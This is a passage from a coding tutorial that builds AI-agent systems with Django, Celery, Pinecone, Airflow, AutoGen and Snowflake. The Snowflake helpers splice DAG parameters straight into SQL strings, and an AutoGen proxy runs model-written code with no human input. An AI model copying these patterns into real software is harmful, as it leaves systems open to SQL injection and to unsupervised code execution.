155 update_knowledge_base.delay(str(item.id))
156
157 headers = self.get_success_headers(serializer.data)
158 return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
159
160 def update(self, request, *args, **kwargs):
161 """Update a knowledge item and re-index it."""
162 partial = kwargs.pop('partial', False)
163 instance = self.get_object()
164 serializer = self.get_serializer(instance, data=request.data, partial=partial)
165 serializer.is_valid(raise_exception=True)
166 item = serializer.save()
167
168 # Queue indexing task
169 update_knowledge_base.delay(str(item.id))
170
171 return Response(serializer.data)
172
173 def destroy(self, request, *args, **kwargs):
174 """Delete a knowledge item and remove from index."""
175 instance = self.get_object()
176
177 # If it has a vector ID, remove from Pinecone
178 if instance.vector_id:
179 try:
180 pinecone_client = PineconeClient()
181 pinecone_client.delete_item(instance.vector_id)
182 except Exception as e:
183 logger.error(f"Error removing item from Pinecone: {str(e)}")
184
185 self.perform_destroy(instance)
186 return Response(status=status.HTTP_204_NO_CONTENT)
187
188 @action(detail=False, methods=['post'])
189 def search(self, request):
190 """Search knowledge items by semantic similarity."""
191 query = request.data.get('query')
192 if not query:
193 return Response(
194 {"detail": "Query is required."},
195 status=status.HTTP_400_BAD_REQUEST
196 )
197
198 filters = request.data.get('filters', {})
199 top_k = int(request.data.get('limit', 5))
200
201 # Add user filter
202 filters["user_id"] = str(request.user.id)
203
204 try:
205 pinecone_client = PineconeClient()
206 results = pinecone_client.search(query, filters, top_k)
207
208 # Get item IDs from results
209 item_ids = [result['id'] for result in results]
210
211 # Fetch full items from database
212 items = KnowledgeItem.objects.filter(id__in=item_ids)
213 item_dict = {str(item.id): item for item in items}
214
215 # Combine database items with search results
216 enriched_results = []
217 for result in results:
218 item = item_dict.get(result['id'])
219 if item:
220 enriched_results.append({
221 "id": str(item.id),
222 "title": item.title,
223 "content": item.content,
224 "domain": item.domain,
225 "tags": item.tags,
226 "source": item.source,
227 "created_at": item.created_at.isoformat(),
228 "relevance_score": result['score']
229 })
230
231 return Response({
232 "results": enriched_results,
233 "count": len(enriched_results),
234 "query": query
235 })
236
237 except Exception as e:
238 logger.error(f"Error searching knowledge: {str(e)}")
239 return Response(
240 {"detail": f"Search error: {str(e)}"},
241 status=status.HTTP_500_INTERNAL_SERVER_ERROR
242 )
243
244class ConversationViewSet(viewsets.ModelViewSet):
245 """ViewSet for managing conversations."""
246 serializer_class = ConversationSerializer
247 permission_classes = [permissions.IsAuthenticated]
248
249 def get_queryset(self):
250 """Return conversations for the current user."""
251 queryset = Conversation.objects.filter(
252 user=self.request.user
253 ).order_by('-updated_at')
254
255 # Filter by active status if specified
256 is_active = self.request.query_params.get('is_active')
257 if is_active is not None:
258 is_active = is_active.lower() == 'true'
259 queryset = queryset.filter(is_active=is_active)
260
261 # Filter by topic if specified
262 topic = self.request.query_params.get('topic')
263 if topic:
264 queryset = queryset.filter(topic=topic)
265
266 return queryset
267
268 @action(detail=True, methods=['post'])
269 def add_message(self, request, pk=None):
270 """Add a new message to the conversation and get a response."""
271 conversation = self.get_object()
272
273 serializer = ConversationMessageSerializer(data=request.data)
274 serializer.is_valid(raise_exception=True)
275
276 # Create the message
277 message = Message.objects.create(
278 conversation=conversation,
279 role=serializer.validated_data.get('role', 'user'),
280 content=serializer.validated_data['content'],
281 token_count=len(serializer.validated_data['content'].split()) * 1.3 # Approximate token count
282 )
283
284 # Update conversation timestamp
285 conversation.updated_at = timezone.now()
286 conversation.save(update_fields=['updated_at'])
287
288 # Queue task to process the message if it's from the user
289 if message.role == 'user':
290 process_conversation.delay(str(conversation.id), str(message.id))
291
292 # Return the created message
293 message_serializer = MessageSerializer(message)
294
295 return Response({
296 "message": message_serializer.data,
297 "status": "processing" if message.role == 'user' else "completed"
298 })
299
300 @action(detail=True, methods=['get'])
301 def messages(self, request, pk=None):
302 """Get messages for a conversation with pagination."""
303 conversation = self.get_object()
304
305 # Get messages with pagination
306 messages = conversation.messages.order_by('created_at')
307
308 # Get page parameters
309 page = self.paginate_queryset(messages)
310 if page is not None:
311 serializer = MessageSerializer(page, many=True)
312 return self.get_paginated_response(serializer.data)
313
314 serializer = MessageSerializer(messages, many=True)
315 return Response(serializer.data)
316
317 @action(detail=True, methods=['post'])
318 def archive(self, request, pk=None):
319 """Archive a conversation (mark as inactive)."""
320 conversation = self.get_object()
321 conversation.is_active = False
322 conversation.save(update_fields=['is_active', 'updated_at'])
323
324 return Response({"status": "success", "detail": "Conversation archived"})
325
326class MessageViewSet(viewsets.ReadOnlyModelViewSet):
327 """ViewSet for reading messages (no direct creation/update)."""
328 serializer_class = MessageSerializer
329 permission_classes = [permissions.IsAuthenticated]
330
331 def get_queryset(self):
332 """Return messages that belong to the current user's conversations."""
333 return Message.objects.filter(
334 conversation__user=self.request.user
335 ).order_by('created_at')
336
337 def list(self, request, *args, **kwargs):
338 """Messages must be accessed through a conversation."""
339 return Response(
340 {"detail": "Messages must be accessed through a specific conversation."},
341 status=status.HTTP_400_BAD_REQUEST
342 )
343
344class VectorDatabaseStatsView(APIView):
345 """View for getting vector database statistics."""
346 permission_classes = [permissions.IsAuthenticated]
347
348 def get(self, request, format=None):
349 """Get statistics about the vector database."""
350 try:
351 pinecone_client = PineconeClient()
352 stats = pinecone_client.get_stats()
353
354 # Get count of user's knowledge items
355 user_items_count = KnowledgeItem.objects.filter(
356 user=request.user,
357 vector_id__isnull=False
358 ).count()
359
360 return Response({
361 "user_items_count": user_items_count,
362 "total_vectors": stats.get("total_vector_count", 0),
363 "dimension": stats.get("dimension", 0),
364 "namespaces": stats.get("namespaces", {})
365 })
366
367 except Exception as e:
368 logger.error(f"Error getting vector database stats: {str(e)}")
369 return Response(
370 {"detail": f"Error: {str(e)}"},
371 status=status.HTTP_500_INTERNAL_SERVER_ERROR
372 )
python
1# agent_app/urls.py
2from django.urls import path, include
3from rest_framework.routers import DefaultRouter
4from . import views
5
6router = DefaultRouter()
7router.register(r'tasks', views.AgentTaskViewSet, basename='task')
8router.register(r'knowledge', views.KnowledgeItemViewSet, basename='knowledge')
9router.register(r'conversations', views.ConversationViewSet, basename='conversation')
10router.register(r'messages', views.MessageViewSet, basename='message')
11
12urlpatterns = [
13 path('', include(router.urls)),
14 path('vector-stats/', views.VectorDatabaseStatsView.as_view(), name='vector-stats'),
15]

Finally, let's create the admin interface:

python
1# agent_app/admin.py
2from django.contrib import admin
3from .models import AgentTask, KnowledgeItem, Conversation, Message
4
5@admin.register(AgentTask)
6class AgentTaskAdmin(admin.ModelAdmin):
7 list_display = ('id', 'title', 'user', 'task_type', 'status', 'priority', 'created_at')
8 list_filter = ('status', 'task_type', 'priority')
9 search_fields = ('title', 'description', 'user__username')
10 readonly_fields = ('created_at', 'updated_at', 'started_at', 'completed_at', 'celery_task_id')
11 date_hierarchy = 'created_at'
12
13@admin.register(KnowledgeItem)
14class KnowledgeItemAdmin(admin.ModelAdmin):
15 list_display = ('id', 'title', 'user', 'domain', 'created_at')
16 list_filter = ('domain',)
17 search_fields = ('title', 'content', 'user__username')
18 readonly_fields = ('created_at', 'vector_id', 'last_updated')
19
20@admin.register(Conversation)
21class ConversationAdmin(admin.ModelAdmin):
22 list_display = ('id', 'title', 'user', 'topic', 'is_active', 'created_at', 'updated_at')
23 list_filter = ('is_active', 'topic')
24 search_fields = ('title', 'user__username')
25 readonly_fields = ('created_at', 'updated_at')
26
27@admin.register(Message)
28class MessageAdmin(admin.ModelAdmin):
29 list_display = ('id', 'conversation', 'role', 'token_count', 'created_at')
30 list_filter = ('role',)
31 search_fields = ('content', 'conversation__title')
32 readonly_fields = ('created_at',)

Key Advantages:

  1. Task Orchestration: Celery provides robust task queuing and scheduling for asynchronous agent operations
  2. Persistence: Django models provide structured data storage with proper relationships
  3. Scalability: Tasks can be distributed across multiple workers
  4. Semantic Search: Pinecone enables fast vector search for knowledge retrieval
  5. Easy API Development: Django REST Framework provides a clean API interface

Production Considerations:

  1. Task Queue Monitoring:

For production systems, you would want to add proper monitoring for Celery tasks:

python
1# monitoring/celery_monitoring.py
2from flower.utils.broker import Broker
3from celery.events.state import State
4import logging
5import json
6import time
7import requests
8
9logger = logging.getLogger('agent_app.monitoring')
10
11class CeleryMonitor:
12 """Monitor for Celery tasks and workers."""
13
14 def __init__(self, broker_url):
15 self.broker_url = broker_url
16 self.state = State()
17 self.broker = Broker(broker_url)
18
19 def get_worker_stats(self):
20 """Get statistics about active Celery workers."""
21 try:
22 stats = self.broker.info()
23 return {
24 "active_workers": stats.get("active_workers", 0),
25 "worker_heartbeats": stats.get("worker_heartbeats", {}),
26 "processed_tasks": stats.get("processed", 0),
27 "failed_tasks": stats.get("failed", 0),
28 "broker_queue_sizes": stats.get("queue_size", {})
29 }
30 except Exception as e:
31 logger.error(f"Error getting worker stats: {str(e)}")
32 return {
33 "error": str(e),
34 "timestamp": time.time()
35 }
36
37 def get_task_stats(self):
38 """Get statistics about task processing."""
39 try:
40 # This would typically connect to Flower API or Redis directly
41 # Example using Flower API if it's running
42 response = requests.get("http://localhost:5555/api/tasks")
43 tasks = response.json()
44
45 # Calculate statistics
46 task_count = len(tasks)
47
48 # Count tasks by status
49 status_counts = {}
50 for task_id, task in tasks.items():
51 status = task.get("state", "UNKNOWN")
52 status_counts[status] = status_counts.get(status, 0) + 1
53
54 # Count tasks by type
55 type_counts = {}
56 for task_id, task in tasks.items():
57 task_name = task.get("name", "UNKNOWN")
58 type_counts[task_name] = type_counts.get(task_name, 0) + 1
59
60 return {
61 "task_count": task_count,
62 "status_counts": status_counts,
63 "type_counts": type_counts
64 }
65 except Exception as e:
66 logger.error(f"Error getting task stats: {str(e)}")
67 return {
68 "error": str(e),
69 "timestamp": time.time()
70 }
71
72 def check_health(self):
73 """Check if Celery is healthy."""
74 try:
75 worker_stats = self.get_worker_stats()
76
77 # Consider unhealthy if no active workers
78 if worker_stats.get("active_workers", 0) == 0:
79 return {
80 "status": "unhealthy",
81 "reason": "No active workers",
82 "timestamp": time.time()
83 }
84
85 # Consider unhealthy if excessive failed tasks
86 if worker_stats.get("failed_tasks", 0) > 1000:
87 return {
88 "status": "degraded",
89 "reason": "High failure rate",
90 "timestamp": time.time()
91 }
92
93 return {
94 "status": "healthy",
95 "active_workers": worker_stats.get("active_workers", 0),
96 "timestamp": time.time()
97 }
98 except Exception as e:
99 logger.error(f"Error checking Celery health: {str(e)}")
100 return {
101 "status": "unknown",
102 "error": str(e),
103 "timestamp": time.time()
104 }
  1. Handling Long-Running Tasks:

For production, you should implement proper handling of long-running tasks:

python
1# long_running_task_handler.py
2import time
3import signal
4import threading
5from functools import wraps
6from celery.exceptions import SoftTimeLimitExceeded
7
8def timeout_handler(func=None, timeout=1800, callback=None):
9 """
10 Decorator to handle timeouts for long-running functions.
11
12 Args:
13 func: The function to decorate
14 timeout: Timeout in seconds
15 callback: Function to call on timeout
16
17 Returns:
18 Decorated function
19 """
20 def decorator(f):
21 @wraps(f)
22 def wrapped(*args, **kwargs):
23 # Store the result
24 result = [None]
25 exception = [None]
26
27 # Define thread target
28 def target():
29 try:
30 result[0] = f(*args, **kwargs)
31 except Exception as e:
32 exception[0] = e
33
34 # Create and start thread
35 thread = threading.Thread(target=target)
36 thread.daemon = True
37 thread.start()
38
39 # Wait for thread to complete or timeout
40 thread.join(timeout)
41
42 # Handle timeout
43 if thread.is_alive():
44 if callback:
45 callback()
46
47 # Raise timeout exception
48 raise TimeoutError(f"Function {f.__name__} timed out after {timeout} seconds")
49
50 # Handle exception
51 if exception[0]:
52 raise exception[0]
53
54 return result[0]
55
56 return wrapped
57
58 if func:
59 return decorator(func)
60
61 return decorator
62
63# Example usage in task
64@shared_task(bind=True)
65def complex_analysis_task(self, task_id):
66 try:
67 # Get task
68 task = AgentTask.objects.get(id=task_id)
69 task.set_processing(self.request.id)
70
71 # Define timeout callback
72 def on_timeout():
73 logger.error(f"Task {task_id} timed out")
74 task.set_failed("Task exceeded time limit")
75
76 # Use timeout handler for complex processing
77 @timeout_handler(timeout=1800, callback=on_timeout)
78 def run_complex_analysis(data):
79 # Complex analysis code here
80 # ...
81 return result
82
83 # Run with timeout handler
84 result = run_complex_analysis(task.input_data)
85
86 # Update task
87 task.set_completed(result)
88 return result
89
90 except SoftTimeLimitExceeded:
91 logger.error(f"Task {task_id} exceeded soft time limit")
92 task.set_failed("Task exceeded time limit")
93 return {"error": "Task exceeded time limit"}
94
95 except TimeoutError as e:
96 logger.error(f"Task {task_id} timed out: {str(e)}")
97 task.set_failed(f"Task timed out: {str(e)}")
98 return {"error": str(e)}
99
100 except Exception as e:
101 logger.error(f"Error in task {task_id}: {str(e)}")
102 task.set_failed(str(e))
103 return {"error": str(e)}
  1. Rate Limiting and Backoff:

For production, implement rate limiting and exponential backoff:

python
1# rate_limiting.py
2import time
3import redis
4import functools
5import random
6import logging
7
8logger = logging.getLogger('agent_app.rate_limiting')
9
10class RateLimiter:
11 """Rate limiter using Redis."""
12
13 def __init__(self, redis_url, limit_key, limit_rate, limit_period=60):
14 """
15 Initialize rate limiter.
16
17 Args:
18 redis_url: Redis URL
19 limit_key: Key prefix for rate limiting
20 limit_rate: Maximum number of calls
21 limit_period: Period in seconds
22 """
23 self.redis = redis.from_url(redis_url)
24 self.limit_key = limit_key
25 self.limit_rate = limit_rate
26 self.limit_period = limit_period
27
28 def is_rate_limited(self, subkey=None):
29 """
30 Check if the current call is rate limited.
31
32 Args:
33 subkey: Optional subkey for more granular limiting
34
35 Returns:
36 bool: True if rate limited, False otherwise
37 """
38 key = f"{self.limit_key}:{subkey}" if subkey else self.limit_key
39
40 # Get current count
41 current = self.redis.get(key)
42
43 # If no current count, initialize
44 if current is None:
45 self.redis.set(key, 1, ex=self.limit_period)
46 return False
47
48 # Increment count
49 count = self.redis.incr(key)
50
51 # Check if rate limited
52 if count > self.limit_rate:
53 # Get TTL to know how long until reset
54 ttl = self.redis.ttl(key)
55 logger.warning(f"Rate limited for {key}. TTL: {ttl}")
56 return True
57
58 return False
59
60 def get_remaining(self, subkey=None):
61 """Get remaining calls allowed."""
62 key = f"{self.limit_key}:{subkey}" if subkey else self.limit_key
63
64 # Get current count
65 current = self.redis.get(key)
66
67 if current is None:
68 return self.limit_rate
69
70 return max(0, self.limit_rate - int(current))
71
72 def get_reset_time(self, subkey=None):
73 """Get time until rate limit resets."""
74 key = f"{self.limit_key}:{subkey}" if subkey else self.limit_key
75
76 # Get TTL
77 ttl = self.redis.ttl(key)
78
79 if ttl < 0:
80 return 0
81
82 return ttl
83
84def with_rate_limiting(limiter, subkey_func=None, max_retries=3, backoff_base=2):
85 """
86 Decorator for rate limiting functions.
87
88 Args:
89 limiter: RateLimiter instance
90 subkey_func: Function to extract subkey from args/kwargs
91 max_retries: Maximum number of retries
92 backoff_base: Base for exponential backoff
93
94 Returns:
95 Decorated function
96 """
97 def decorator(func):
98 @functools.wraps(func)
99 def wrapped(*args, **kwargs):
100 # Get subkey if provided
101 subkey = None
102 if subkey_func:
103 subkey = subkey_func(*args, **kwargs)
104
105 retries = 0
106 while retries <= max_retries:
107 # Check rate limiting
108 if limiter.is_rate_limited(subkey):
109 # If max retries reached, raise exception
110 if retries >= max_retries:
111 reset_time = limiter.get_reset_time(subkey)
112 raise RateLimitExceeded(
113 f"Rate limit exceeded. Try again in {reset_time} seconds."
114 )
115
116 # Calculate backoff with jitter
117 backoff = (backoff_base ** retries) + random.uniform(0, 0.5)
118
119 # Log and sleep
120 logger.info(f"Rate limited. Retrying in {backoff:.2f} seconds. Retry {retries+1}/{max_retries}")
121 time.sleep(backoff)
122
123 retries += 1
124 else:
125 # Not rate limited, execute function
126 return func(*args, **kwargs)
127
128 # Should not reach here due to exception above
129 return None
130
131 return wrapped
132
133 return decorator
134
135class RateLimitExceeded(Exception):
136 """Exception raised when rate limit is exceeded."""
137 pass
138
139# Example usage
140# Initialize limiter for OpenAI API
141openai_limiter = RateLimiter(
142 redis_url="redis://localhost:6379/0",
143 limit_key="openai_api",
144 limit_rate=100, # 100 requests per minute
145 limit_period=60
146)
147
148# Use in function
149@with_rate_limiting(
150 limiter=openai_limiter,
151 subkey_func=lambda user_id, *args, **kwargs: f"user:{user_id}",
152 max_retries=3
153)
154def call_openai_api(user_id, prompt):
155 # API call here
156 pass

This stack is particularly well-suited for organizations that need to:

  • Build complex task orchestration systems with AI agents
  • Maintain a centralized knowledge base for semantic search
  • Implement conversational applications with persistent state
  • Create document processing workflows with AI analysis
  • Support background processing with robust task management

Airflow + AutoGen + OpenAI Functions + Snowflake (Enterprise AI Automation)

This stack is optimized for enterprise-grade AI workflows that require robust scheduling, governance, and integration with enterprise data platforms. It's particularly well-suited for data-intensive applications that need to operate on a schedule and integrate with existing data infrastructure.

Architecture Overview:

Airflow + AutoGen + Snowflake Architecture

The architecture consists of:

  1. Apache Airflow: Workflow orchestration engine for scheduling and monitoring
  2. AutoGen: Multi-agent orchestration framework
  3. OpenAI Functions: Structured function calling for agents
  4. Snowflake: Enterprise data platform for storage and analytics
  5. MLflow: Experiment tracking and model registry

Implementation Example:

Let's implement an Airflow DAG that orchestrates AI agents to analyze financial data in Snowflake:

python
1# dags/financial_analysis_agent_dag.py
2import os
3import json
4import datetime
5import tempfile
6import pendulum
7import autogen
8import pandas as pd
9import snowflake.connector
10from snowflake.connector.pandas_tools import write_pandas
11import openai
12import requests
13import mlflow
14from io import StringIO
15
16from airflow import DAG
17from airflow.models import Variable
18from airflow.operators.python import PythonOperator
19from airflow.operators.trigger_dagrun import TriggerDagRunOperator
20from airflow.providers.snowflake.operators.snowflake import SnowflakeOperator
21from airflow.providers.snowflake.hooks.snowflake import SnowflakeHook
22from airflow.utils.dates import days_ago
23from airflow.models.param import Param
24
25# Connect to OpenAI with API key from Airflow Variable
26openai_api_key = Variable.get("OPENAI_API_KEY", default_var="")
27os.environ["OPENAI_API_KEY"] = openai_api_key
28openai.api_key = openai_api_key
29
30# Default arguments for DAG
31default_args = {
32 'owner': 'data_science',
33 'depends_on_past': False,
34 'email': ['data_science@example.com'],
35 'email_on_failure': True,
36 'email_on_retry': False,
37 'retries': 1,
38 'retry_delay': datetime.timedelta(minutes=5),
39}
40
41# Define DAG
42dag = DAG(
43 'financial_analysis_agent',
44 default_args=default_args,
45 description='AI agent pipeline for financial data analysis',
46 schedule_interval='0 4 * * 1-5', # 4 AM on weekdays
47 start_date=days_ago(1),
48 catchup=False,
49 max_active_runs=1,
50 concurrency=3,
51 tags=['ai_agents', 'finance', 'analysis'],
52 params={
53 'analysis_date': Param(
54 default=pendulum.now().subtract(days=1).to_date_string(),
55 type='string',
56 format='date'
57 ),
58 'stock_symbols': Param(
59 default='["AAPL", "MSFT", "GOOGL", "AMZN", "META"]',
60 type='string'
61 ),
62 'report_type': Param(
63 default='standard',
64 type='string',
65 enum=['standard', 'detailed', 'executive']
66 ),
67 'include_sentiment': Param(
68 default=True,
69 type='boolean'
70 )
71 }
72)
73
74# Helper functions
75def get_snowflake_connection():
76 """Get Snowflake connection from Airflow hook."""
77 hook = SnowflakeHook(snowflake_conn_id='snowflake_default')
78 conn = hook.get_conn()
79 return conn
80
81def fetch_stock_data(date_str, symbols):
82 """Fetch stock data from Snowflake for specified date and symbols."""
83 symbols_str = ", ".join([f"'{s}'" for s in symbols])
84 query = f"""
85 SELECT
86 symbol,
87 date,
88 open,
89 high,
90 low,
91 close,
92 volume,
93 adj_close
94 FROM
95 finance.stocks.daily_prices
96 WHERE
97 date = '{date_str}'
98 AND symbol IN ({symbols_str})
99 ORDER BY
100 symbol, date
101 """
102
103 conn = get_snowflake_connection()
104 cursor = conn.cursor()
105 cursor.execute(query)
106
107 # Convert to Pandas DataFrame
108 result = cursor.fetchall()
109 columns = [desc[0] for desc in cursor.description]
110 df = pd.DataFrame(result, columns=columns)
111 cursor.close()
112
113 return df
114
115def fetch_financial_news(date_str, symbols):
116 """Fetch financial news from Snowflake for specified date and symbols."""
117 symbols_str = ", ".join([f"'{s}'" for s in symbols])
118 query = f"""
119 SELECT
120 headline,
121 source,
122 url,
123 published_at,
124 sentiment,
125 symbols
126 FROM
127 finance.news.articles
128 WHERE
129 DATE(published_at) = '{date_str}'
130 AND symbols_array && ARRAY_CONSTRUCT({symbols_str})
131 ORDER BY
132 published_at DESC
133 LIMIT
134 50
135 """
136
137 conn = get_snowflake_connection()
138 cursor = conn.cursor()
139 cursor.execute(query)
140
141 # Convert to Pandas DataFrame
142 result = cursor.fetchall()
143 columns = [desc[0] for desc in cursor.description]
144 df = pd.DataFrame(result, columns=columns)
145 cursor.close()
146
147 return df
148
149def store_analysis_results(analysis_results, date_str):
150 """Store analysis results in Snowflake."""
151 # Create DataFrame from analysis results
152 if isinstance(analysis_results, str):
153 # If results are a string (like JSON), parse it
154 try:
155 results_dict = json.loads(analysis_results)
156 except:
157 # If not valid JSON, create a simple dict
158 results_dict = {"analysis_text": analysis_results}
159 else:
160 # Already a dict-like object
161 results_dict = analysis_results
162
163 # Flatten nested dictionaries
164 flat_results = {}
165 for key, value in results_dict.items():
166 if isinstance(value, dict):
167 for sub_key, sub_value in value.items():
168 if isinstance(sub_value, (dict, list)):
169 flat_results[f"{key}_{sub_key}"] = json.dumps(sub_value)
170 else:
171 flat_results[f"{key}_{sub_key}"] = sub_value
172 elif isinstance(value, list):
173 flat_results[key] = json.dumps(value)
174 else:
175 flat_results[key] = value
176
177 # Add analysis date
178 flat_results['analysis_date'] = date_str
179 flat_results['created_at'] = datetime.datetime.now().isoformat()
180
181 # Create DataFrame
182 df = pd.DataFrame([flat_results])
183
184 # Upload to Snowflake
185 conn = get_snowflake_connection()
186 success, num_chunks, num_rows, output = write_pandas(
187 conn=conn,
188 df=df,
189 table_name='AGENT_ANALYSIS_RESULTS',
190 schema='REPORTS',
191 database='FINANCE'
192 )
193
194 conn.close()
195
196 return {
197 'success': success,
198 'num_rows': num_rows,
199 'table': 'FINANCE.REPORTS.AGENT_ANALYSIS_RESULTS'
200 }
201
202# Task functions
203def extract_data(**context):
204 """Extract relevant financial data for analysis."""
205 # Get parameters
206 params = context['params']
207 analysis_date = params.get('analysis_date')
208 stock_symbols = json.loads(params.get('stock_symbols'))
209
210 # Fetch stock price data
211 stock_data = fetch_stock_data(analysis_date, stock_symbols)
212 if stock_data.empty:
213 raise ValueError(f"No stock data found for {analysis_date} and symbols {stock_symbols}")
214
215 # Fetch financial news
216 news_data = fetch_financial_news(analysis_date, stock_symbols) if params.get('include_sentiment') else pd.DataFrame()
217
218 # Calculate basic metrics
219 metrics = {}
220 for symbol in stock_symbols:
221 symbol_data = stock_data[stock_data['symbol'] == symbol]
222 if not symbol_data.empty:
223 metrics[symbol] = {
224 'open': float(symbol_data['open'].iloc[0]),
225 'close': float(symbol_data['close'].iloc[0]),
226 'high': float(symbol_data['high'].iloc[0]),
227 'low': float(symbol_data['low'].iloc[0]),
228 'volume': int(symbol_data['volume'].iloc[0]),
229 'daily_change': float(symbol_data['close'].iloc[0] - symbol_data['open'].iloc[0]),
230 'daily_change_pct': float((symbol_data['close'].iloc[0] - symbol_data['open'].iloc[0]) / symbol_data['open'].iloc[0] * 100)
231 }
232
233 # Prepare data for AI analysis
234 analysis_data = {
235 'date': analysis_date,
236 'symbols': stock_symbols,
237 'stock_data': stock_data.to_dict(orient='records'),
238 'metrics': metrics,
239 'news_data': news_data.to_dict(orient='records') if not news_data.empty else []
240 }
241
242 # Save to XCom for next task
243 context['ti'].xcom_push(key='analysis_data', value=analysis_data)
244
245 return analysis_data
246
247def run_analysis_agents(**context):
248 """Run AI agents for financial analysis."""
249 # Get parameters and data
250 params = context['params']
251 analysis_data = context['ti'].xcom_pull(task_ids='extract_data', key='analysis_data')
252 report_type = params.get('report_type')
253
254 # Configure OpenAI
255 client = openai.OpenAI(api_key=openai_api_key)
256
257 # Define AutoGen agents for financial analysis
258
259 # 1. Financial Analyst Agent - Core analysis
260 analyst_agent = autogen.AssistantAgent(
261 name="FinancialAnalyst",
262 llm_config={
263 "config_list": [{"model": "gpt-4-turbo", "api_key": openai_api_key}],
264 "temperature": 0.2,
265 "functions": [
266 {
267 "name": "analyze_stock_performance",
268 "description": "Analyze the performance of stocks based on price data",
269 "parameters": {
270 "type": "object",
271 "properties": {
272 "symbol": {"type": "string", "description": "Stock symbol to analyze"},
273 "metrics": {
274 "type": "object",
275 "description": "Performance metrics to calculate"
276 },
277 "context": {"type": "string", "description": "Additional context for analysis"}
278 },
279 "required": ["symbol", "metrics"]
280 }
281 },
282 {
283 "name": "analyze_news_sentiment",
284 "description": "Analyze sentiment from news articles",
285 "parameters": {
286 "type": "object",
287 "properties": {
288 "symbol": {"type": "string", "description": "Stock symbol to analyze news for"},
289 "news_items": {"type": "array", "description": "List of news articles"},
290 "summary_length": {"type": "integer", "description": "Length of summary to generate"}
291 },
292 "required": ["symbol", "news_items"]
293 }
294 }
295 ]
296 },
297 system_message="""You are an expert financial analyst specialized in stock market analysis.
298 Your task is to analyze stock performance and provide insights based on price data and news.
299 Be analytical, precise, and focus on data-driven insights.
300 Consider market trends, volatility, and comparative performance when analyzing stocks.
301 Your analysis should be suitable for institutional investors and financial professionals."""
302 )
303
304 # 2. Data Scientist Agent - Advanced metrics and models
305 data_scientist_agent = autogen.AssistantAgent(
306 name="DataScientist",
307 llm_config={
308 "config_list": [{"model": "gpt-4-turbo", "api_key": openai_api_key}],
309 "temperature": 0.1,
310 "functions": [
311 {
312 "name": "calculate_technical_indicators",
313 "description": "Calculate technical indicators for stock analysis",
314 "parameters": {
315 "type": "object",
316 "properties": {
317 "symbol": {"type": "string", "description": "Stock symbol"},
318 "price_data": {"type": "object", "description": "Price data for the stock"},
319 "indicators": {"type": "array", "items": {"type": "string"}, "description": "Indicators to calculate"}
320 },
321 "required": ["symbol", "price_data"]
322 }
323 },
324 {
325 "name": "compare_performance",
326 "description": "Compare performance between multiple stocks",
327 "parameters": {
328 "type": "object",
329 "properties": {
330 "symbols": {"type": "array", "items": {"type": "string"}, "description": "Stock symbols to compare"},
331 "metrics": {"type": "object", "description": "Metrics for each stock"}
332 },
333 "required": ["symbols", "metrics"]
334 }
335 }
336 ]
337 },
338 system_message="""You are an expert data scientist specializing in financial markets.
339 Your role is to perform advanced statistical analysis and calculate technical indicators.
340 Focus on quantitative metrics, correlations, and statistical significance.
341 Identify patterns and anomalies in the data that might not be immediately obvious.
342 Your analysis should be rigorous and mathematically sound."""
343 )
344
345 # 3. Report Writer Agent - Generate final report
346 report_writer_agent = autogen.AssistantAgent(
347 name="ReportWriter",
348 llm_config={
349 "config_list": [{"model": "gpt-4-turbo", "api_key": openai_api_key}],
350 "temperature": 0.7,
351 "functions": [
352 {
353 "name": "generate_financial_report",
354 "description": "Generate a comprehensive financial report",
355 "parameters": {
356 "type": "object",
357 "properties": {
358 "title": {"type": "string", "description": "Report title"},
359 "date": {"type": "string", "description": "Analysis date"},
360 "summary": {"type": "string", "description": "Executive summary"},
361 "stock_analyses": {"type": "object", "description": "Analysis for each stock"},
362 "market_overview": {"type": "string", "description": "Overall market context"},
363 "recommendations": {"type": "array", "items": {"type": "string"}, "description": "Investment recommendations"},
364 "report_type": {"type": "string", "enum": ["standard", "detailed", "executive"], "description": "Type of report to generate"}
365 },
366 "required": ["title", "date", "stock_analyses", "report_type"]
367 }
368 }
369 ]
370 },
371 system_message="""You are an expert financial report writer.
372 Your task is to synthesize financial analysis into clear, professional reports.
373 Organize information logically with appropriate sections and headers.
374 Use precise financial terminology while keeping the content accessible.
375 Highlight key insights and structure the report according to the specified type:
376 - standard: Balanced detail and length for general professional use
377 - detailed: Comprehensive analysis with extensive data and charts
378 - executive: Concise summary focused on key takeaways and recommendations"""
379 )
380
381 # User proxy agent to coordinate the workflow
382 user_proxy = autogen.UserProxyAgent(
383 name="FinancialDataManager",
384 human_input_mode="NEVER",
385 code_execution_config={"work_dir": "financial_analysis_workspace"}
386 )
387
388 # Create a group chat for the agents
389 groupchat = autogen.GroupChat(
390 agents=[user_proxy, analyst_agent, data_scientist_agent, report_writer_agent],
391 messages=[],
392 max_round=15
393 )
394 manager = autogen.GroupChatManager(groupchat=groupchat)
395
396 # Start the analysis process
397 stock_data_str = json.dumps(analysis_data['stock_data'][:5]) if len(analysis_data['stock_data']) > 5 else json.dumps(analysis_data['stock_data'])
398 news_data_str = json.dumps(analysis_data['news_data'][:5]) if len(analysis_data['news_data']) > 5 else json.dumps(analysis_data['news_data'])
399
400 prompt = f"""
401 Task: Perform financial analysis for the following stocks: {analysis_data['symbols']} on {analysis_data['date']}.
402
403 Report Type: {report_type}
404
405 Stock Metrics:
406 {json.dumps(analysis_data['metrics'], indent=2)}
407
408 Sample Stock Data:
409 {stock_data_str}
410
411 Sample News Data:
412 {news_data_str}
413
414 Create a comprehensive financial analysis report with the following components:
415 1. Market overview for the date
416 2. Individual stock analysis for each symbol
417 3. Comparative performance analysis
418 4. Key insights and patterns
419 5. Recommendations based on the data
420
421 The FinancialAnalyst should begin by analyzing each stock's performance.
422 The DataScientist should then calculate technical indicators and compare performance.
423 Finally, the ReportWriter should compile all analyses into a coherent report.
424
425 The final deliverable should be a complete financial analysis report in the requested format.
426 """
427
428 # Start the group chat
429 result = user_proxy.initiate_chat(manager, message=prompt)
430
431 # Extract the final report from the chat
432 final_report = None
433 for message in reversed(user_proxy.chat_history):
434 if message['role'] == 'assistant' and 'ReportWriter' in message.get('name', ''):
435 final_report = message['content']
436 break
437
438 if not final_report:
439 # Extract best available result if no clear final report
440 for message in reversed(user_proxy.chat_history):
441 if message['role'] == 'assistant' and len(message['content']) > 500:
442 final_report = message['content']
443 break
444
445 # Process and structure the report
446 try:
447 # Try to extract structured data using OpenAI
448 structure_response = client.chat.completions.create(
449 model="gpt-4-turbo",
450 messages=[
